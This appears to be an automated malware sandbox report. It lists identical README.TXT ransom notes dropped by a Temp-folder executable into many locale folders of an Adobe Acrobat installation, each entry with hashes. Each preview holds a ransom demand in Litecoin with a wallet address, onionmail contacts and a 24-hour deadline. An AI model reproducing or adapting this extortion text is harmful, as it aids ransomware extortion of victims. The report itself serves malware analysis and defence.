                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ar-ae\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ca-es\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\cs-cz\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\da-dk\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\de-de\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-ae\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-gb\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-il\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\es-es\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fi-fi\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-fr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-ma\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\he-il\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hr-hr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
